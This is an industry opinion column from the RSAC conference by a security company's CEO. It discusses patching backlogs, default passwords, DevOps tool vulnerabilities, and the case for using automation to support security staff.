SAN FRANCISCO – In the North and South Hall, RSAC attendees at the Moscone Center on Monday were busy examining the new features and benefits of the new products on display, looking to fill gaps in their security programs. But at session breaks and in lunch lines, the conversation turned to human bandwidth: the ability to execute known tasks when unplanned, but urgent priorities divert resources and attention from them, putting the organization’s security posture at risk.
Security teams are concerned that their IT systems suffer from exploitable, years-old vulnerabilities that either aren’t patched or haven’t been implemented across the organization in a proven way. Almost everyone in an informal coffee line poll mentioned the CISA Top 15 Routinely Exploited Vulnerabilities list and CISA’s Known Exploited Vulnerabilities Catalog – pointing out that they lacked confidence that their organizations were fully protected.
Industry pros are also concerned about default settings that remain unchanged, or misconfigurations in software and hardware such as routers and firewalls, which threat actors can combine with other weaknesses and vulnerabilities to assemble, then stage a successful attack. Critical software supply chain resources also introduce their own vulnerabilities, and ironically become tools that both help companies advance while potentially compromising their security.
DevOps tools such as Jenkins, GitLab, Kubernetes, and Docker are critical to the software development and design processes that fuel and advance many businesses. When these crucial resources contain vulnerabilities that open the door to attacks, the responsibility inevitably rolls off of the vendor and onto the shoulders of security teams, creating a seemingly endless stream of interruptions that often disrupt other priorities.
Developers use Jenkins for testing and building software projects with continuous integration as well as for allowing to make changes during any stage of the development process, while also sharing the changes in a community repository. One of the most frequent vulnerabilities discovered when using the product are cross-site scripts (XSS), which let an adversary modify web applications by injecting malicious code into web pages viewed by others. DevOps teams also use GitLab, and like Jenkins, unpatched vulnerabilities that enabled attackers were found in numerous customer pen tests.
RSAC attendees also talked about Docker, which automates the application deployment and management of cloud containers. While apps are moved to different platforms on the cloud, Docker lets them still operate for continuous organizational functions.
For RSAC attendees and security teams everywhere, I found at least five takeaways from my conversations with people at the show that organizations need to juggle:
- Security teams struggle with patching policies and keeping systems up-to-date. Vendors say that teams need to “simply” apply the patches or the mitigation actions and confirm that they are fixed. But the sheer volume of the unending patch cycle make it anything but an easy fix.
- Teams don’t always prioritize the right patches. The IT department might patch and fix vulnerabilities that aren’t exploitable within their particular ecosystem or have limited potential impacts.
- Many companies are stuck with legacy technology. Organizations cannot always patch up to the latest version because of compatibility issues with older technologies, so they need to carefully segment the tools to limit a threat actor’s impacts.
- Too many organizations don’t change simple default passwords. IT departments sometimes add new hardware with factory-issued default settings and passwords that are made available on the open web, making them easily exploitable.
- Leverage automation to enhance humans, not replace them. Use automation as an enabler. For example, automation can help accelerate our ability to make decisions when under attack as well as perform penetration tests on infrastructure more effectively to reveal exploitable vulnerabilities and those that don't deserve the valuable time and attention of our limited security talent.
We need to let our precious security talent work on higher-level issues, analyzing where the next attacks will come from. By using automation more strategically, we can tilt the age-old cat-and-mouse adversarial game in favor of the defenders.
Snehal Antani, co-founder and CEO, Horizon3.ai